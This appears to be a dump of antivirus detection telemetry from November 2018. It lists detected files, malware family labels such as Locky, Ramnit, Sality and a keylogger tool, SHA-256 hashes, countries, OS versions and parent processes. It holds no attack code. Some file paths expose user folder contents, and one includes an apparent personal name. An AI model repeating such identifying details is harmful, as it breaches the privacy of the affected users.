  Row(detection=Row(filename='avscan-20181104-205156-8e106e79', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_60cbdcae\\AVSCAN-20181104-205058-85F0D4D8\\AVSCAN-20181104-205156-8E106E79', filesize=8000, name='JS/Dldr.Locky.BCN.#M1.#R1'), hash='c631e34853300c094c5bac5c053ce94c5f390be817cca0813fc677f1f123291d', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T11:51:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='autorun.exe', filepath='d:\\autorun.exe', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T12:50:59Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='instdemo.exe', filepath='C:\\Program Files\\Lenovo\\FastBoot\\InstDemo.exe', filesize=384000, name='W32/Jeefo.A.#M1.#R1'), hash='596d0718432fc89852f4b142871a8680138a4964e4de55a01d151d4435d908bc', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:tFCmOKIR3UWKR8O+.1', country='TH', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-04T02:29:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0001553.exe', filepath='\\\\?\\J:\\System Volume Information\\_restore{66011086-CE33-4617-A019-7C17F0FCBE6A}\\RP3\\A0001553.exe', filesize=128000, name='HEUR/AGEN.1008649.#M1.#R1'), hash='5d4ca5b7ae64fb9fe18b4c2d74d0b13dd4c85003f1d46f9707660666f4bc728d', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:55:27Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-200524-45ae04b9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5e58cd99\\AVSCAN-20181104-200102-24415FE5\\AVSCAN-20181104-200524-45AE04B9', filesize=256000, name='HEUR/APC.#M1.#R1'), hash='35d42ca4d88fa10ec65c2c8f59a1cf1f5bbc207d386fec2bcb861269436c117f', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T14:35:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='epsdneul.exe', filepath='E:\\printer drivers\\epson l120\\Apps\\DownloadNavigator\\EPSDNEUL.EXE', filesize=1232000, name='W32/Sality.AT.#M1.#R1'), hash='d2ff6a5386a5214706e72253661e4b09c37b806f43e78000669c8f6155e15c59', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1378648, timestamp='2018-11-04T09:21:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T15:56:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='bdd1e6ce49412a68dd6a913c0ffcba1fde42cb1f0f5e2921f60b0076324a656a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\BDD1E6CE49412A68DD6A913C0FFCBA1FDE42CB1F0F5E2921F60B0076324A656A', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='bdd1e6ce49412a68dd6a913c0ffcba1fde42cb1f0f5e2921f60b0076324a656a', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T16:06:14Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='9c8d0a43aa95e439cede9b69cacfb3c606381bfd6745111c5cfe73a38af9ae38', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-04T17:56:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='c:\\program files\\prokaward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='9c8d0a43aa95e439cede9b69cacfb3c606381bfd6745111c5cfe73a38af9ae38', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ProKAward\\rsasws.exe', parentsize=98304, timestamp='2018-11-04T14:56:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wedownload manager-buttonutil64.dll', filepath='C:\\Program Files (x86)\\weDownload Manager\\weDownload Manager-buttonutil64.dll', filesize=512000, name='ADWARE/CrossRider.Gen2.#M300.#R101244'), hash='5964c9b107a98dfcb2a486d0c9c30b4e31dab145a7186602e56bef2557340045', metadata=Row(cmdline='invagent.dll,RunUpdate -noappraiser', country='HK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-04T08:10:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dforrt.dll', filepath='D:\\the lasted software\\ANSYS process\\ANSYS Inc\\v120\\icemcfd\\win64_amd\\bin\\dforrt.dll', filesize=512000, name='W32/Ramnit.CD.#M1.#R1'), hash='3733fc7edd059f37cf9b5173a6c6f1045fb96003a1fc43d6ec004a84970a17bf', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=467408, timestamp='2018-11-04T15:12:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-195312-4118338d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e3665925\\AVSCAN-20181104-195119-31F036F3\\AVSCAN-20181104-195312-4118338D', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='HU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T18:53:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-102401-ba8fbec1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_506666b0\\AVSCAN-20181104-102311-B272E1FD\\AVSCAN-20181104-102401-BA8FBEC1', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T03:24:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='wap.exe', filepath='\\\\?\\C:\\Program Files (x86)\\ProKAward\\wap.exe', filesize=4096000, name='SPR/Tool.AwardKeylogger.93.#M1.#R1'), hash='6b0c812488381b7c768741c139ab6bbca0ac260d6775cd552e354bf93925224f', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T13:26:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T04:46:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='search provided by bing docif', filepath='C:\\Windows\\System32\\Tasks\\Search Provided by Bing docif', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='f114c8e8be633ef687950961e4ca8b06cd88077eab28319fdb65d2330a9b5835', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:45:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7b7b5901e37e97f942cba6debfb03a8f2300ba10e88ff528378a268b8920ae13.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_30.10.2018-25.available\\Avira\\7B7B5901E37E97F942CBA6DEBFB03A8F2300BA10E88FF528378A268B8920AE13.VIR', filesize=1408000, name='TR/Crypt.XPACK.Gen7.#M300.#R601544'), hash='7b7b5901e37e97f942cba6debfb03a8f2300ba10e88ff528378a268b8920ae13', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T11:01:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='biên bản thi đua cả năm.exe', filepath='G:\\\xa0\\NGUYEN Ổ C\\Biên bản thi đua cả năm.exe', filesize=1728000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='c829f0471fd190f70d78fed3b4c56e3306cae681025cefafefe6036d572695f6', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-02T12:16:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mevhiqqt.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\meVhiqqT.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:35:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-124324-6d3e95bc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-123820-49F7FCE2\\AVSCAN-20181102-124324-6D3E95BC', filesize=10368000, name='TR/Eroyee.f062a6.#M1.#R1'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:40:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='sculpteouploader.exe', filepath='E:\\Program Files\\Pixologic\\ZBrush 4R8\\ZStartup\\ZPlugs64\\SculpteoData\\Uploader\\SculpteoUploader.exe', filesize=5000000, name='HEUR/AGEN.1028299.#M1.#R1'), hash='b6eec48c274983f3fd910068c1587c2491d810594440a0551dc5d9c577949d3b', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='E:\\Program Files\\Pixologic\\ZBrush 4R8\\ZBrush_4R8_P2_Updater.exe', parentsize=111780192, timestamp='2018-11-02T13:04:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered lacid', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lacid', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='a70a3042b79fab309d8c4c27918d2264c8f48d6169355e45c8fbd8c074c3329a', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T08:52:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7_oem_installer.exe', filepath='\\\\?\\C:\\Users\\X\\Downloads\\7_OEM_Installer.exe', filesize=768000, name='SPR/RedCap.e8e1f6.#M1.#R1'), hash='e8e1f679e26a106dc5da842adb5793ffae44aa0fe4de9eb4defab3fc885c0b5c', metadata=Row(cmdline=None, country='SG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:16:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp004864db', filepath='C:\\Windows\\Temp\\96471c11-35d4-4dc9-ad1d-2aa0b87bc74b\\tmp000002e4\\tmp004864db', filesize=1536000, name='TR/Dropper.Gen.#M300.#R3467'), hash='cac04bd9f620e52722910d4cb065245cdd766dce4430e4ccaf0691bc35bab5bf', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.5.961.11619\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T15:21:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='keygen.exe', filepath='C:\\Users\\X\\Downloads\\Compressed\\FastKeys.v4.13_p30download.com\\Keygen\\Keygen.exe', filesize=192000, name='HEUR/AGEN.1018957.#M1.#R1'), hash='766eaace216cc2443cb5b9b17f55a05af178aeb134d0d8da4ea9eadcf542190f', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:10:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='d1e70b477773967c59a10d0b6c8397a20d6dd9d8a542fc97c785babd3d95bf98', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-30\\D1E70B477773967C59A10D0B6C8397A20D6DD9D8A542FC97C785BABD3D95BF98', filesize=192000, name='TR/Crypt.XPACK.Gen8.#M300.#R700824'), hash='d1e70b477773967c59a10d0b6c8397a20d6dd9d8a542fc97c785babd3d95bf98', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-30.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-27.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-28.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-29.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:06:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='openal32.dll', filepath='C:\\Users\\X\\Desktop\\craftlandia\\CraftLandia Minecraft\\data\\CraftLandia 1.7.2\\data\\.minecraft\\versions\\1.7.2\\1.7.2-natives-14191621041986\\OpenAL32.dll', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='941f88b2709bbdb5011d4d21dd1e6a789338927ec53bfb91b38c64a83921d5bd', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe13_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe13 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T21:20:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-181511-c3bacda1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5718ca8a\\AVSCAN-20181102-181433-BEA36412\\AVSCAN-20181102-181511-C3BACDA1', filesize=256000, name='TR/Crypt.ZPACK.8cad8b.#M1.#R1'), hash='8cad8be634e6630c085a4a7c6ad6cf86e1e1022c3a46305522715c30e273c926', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T17:15:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper', filesize=6144000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='d4cf615d0be9370189b831aaaabe8c44d13c48a4168516cd65bb8f3a62876a75', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T13:43:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-031829-7281106c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8a2407d4\\AVSCAN-20181102-031811-6FB2F949\\AVSCAN-20181102-031829-7281106C', filesize=2944000, name='HEUR/AGEN.1020138.#M1.#R1'), hash='ea0f711f478b41a0d61d30e4c67f69bd5f3b69dd334dd9b3bd835deac9a63812', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:18:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dumpshx.exe', filepath='\\\\ts-xelcea\\share\\Acad\\acad2008\\x64\\program files\\Root\\Express\\dumpshx.exe', filesize=64000, name='W32/Stanit.#M1.#R1'), hash='ffc4ed3966651bba092516c88b6611c1d713f910f69d70b6076669d608182517', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:tJAfutT8U0ao\\\\\\/TyB.1', country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T08:32:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='clydemosaic.dll', filepath='C:\\CSC e-Governance Services India Limited\\digipay\\ClydeMosaic.dll', filesize=1088000, name='W32/Ramnit.CD.#M1.#R1'), hash='83b6ef7aca927b82aa241e9a929c8a5eec13fc89b27a16e05e0a7888a1b419bd', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T09:33:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rtflrkmr.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\RTFlRkMR.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:34:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='! my image.scr', filepath='F:\\! My Image.scr', filesize=0, name='DR/Patched.Ren.Gen.#M1.#R1'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:40:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='анкеты на 2015.exe', filepath='D:\\документы\\Документы отдела кадров\\БГМУ\\Анкеты и заявка на 2015 год\\анкеты на 2015.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='fd3adfe5baf382fb94fff375be717ca38dc4954f5c595c53d065e346fe458879', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-02T05:52:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-235237-a48de3dc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_895e5944\\AVSCAN-20181102-231658-9FA99280\\AVSCAN-20181102-235237-A48DE3DC', filesize=4040000, name='PUA/Systweak.#M1.#R1'), hash='fa280a54d6e939059b025c92eb2bccb3db8ab2265a1c2883b24c68fdfb34a5f1', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T21:52:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~se4635.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\~se4635.tmp', filesize=832000, name='TR/Snarasite.ME.15.#M1.#R1'), hash='fea6e6814f6c07f0cbc5e609755c7131cf91ccff7843eb7ad6653c8c99b9d2e8', metadata=Row(cmdline=None, country='RS', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:15:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='images.scr', filepath='E:\\images.scr', filesize=0, name='TR/Dropper.Gen.#M2.#R7620'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T09:34:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='capafe.exe', filepath='\\\\?\\D:\\programs\\canon 810\\English\\FDImages\\WIN9X\\disk1\\CAPAFE.EXE', filesize=64000, name='HEUR/APC.#M1.#R1'), hash='8ffc41098fd126a52fe2e87e0814ba00ba4efcb3bbef33058f5accdb252d5a79', metadata=Row(cmdline=None, country='IQ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:02:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='reelicons.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\as\\ReelIcons\\ReelIcons.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='c8b2350b7e53a3d3f0a0a513ca9b707f15902e005370150621b869b8f1e6a9d8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maker.exe', filepath='C:\\Program Files (x86)\\TDINTEL\\XTUNER-E3\\SCAN\\EUROPE\\AUDI\\SP\\MAKER.EXE', filesize=1024000, name='W32/Ramnit.CD.#M1.#R1'), hash='c6a25db0fae3180b2b09af9076f09caa1c22081a4f85de5d231082cb1bc2399e', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:IXNmU\\\\\\/SdD0SM9gJj.1', country='CL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T00:52:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-145527-32387ad9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_96e7b237\\AVSCAN-20181102-135942-EE74710F\\AVSCAN-20181102-145527-32387AD9', filesize=3968000, name='ADWARE/MultiPlug.Gen4.#M1.#R1'), hash='8e4e5cd8ae0fe52300ef4db07b262452e9d6314aeeba403aa343ba362f519cdf', metadata=Row(cmdline=None, country='DZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:56:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ccsetup512.exe', filepath='D:\\Users\\X\\Downloads\\ccsetup512.exe', filesize=128000, name='W32/Sality.Y.#M1.#R1'), hash='d7a6507d3871502b59abda5aac6245e31eb4a4e8f09c1b75328dd7ba6516367f', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:02:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsi6C3D.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\fotor_3.41.exe', parentsize=268416568, timestamp='2018-11-02T15:16:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='level10.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL10\\LEVEL10.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='f2522a4e8d7e1f0554f0d7a8a6420b78a1aaf0543838282afb2a55d3a5d9b3f3', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='g:\\users\\X\\appdata\\local\\temp\\loj2gngejgz\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T01:21:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181104-143258-50b6e117', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-131819-F64932D1\\AVSCAN-20181104-143258-50B6E117', filesize=20000, name='PUA/Linkury.#M1.#R1'), hash='d0fb80dc224c4d0d9db5dad3414c4cdb8b685c69825d7c88991020c38ecb718d', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:33:01Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00238926', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp00238926', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:27:01Z'), dt=datetime.date(2018, 11, 4)),
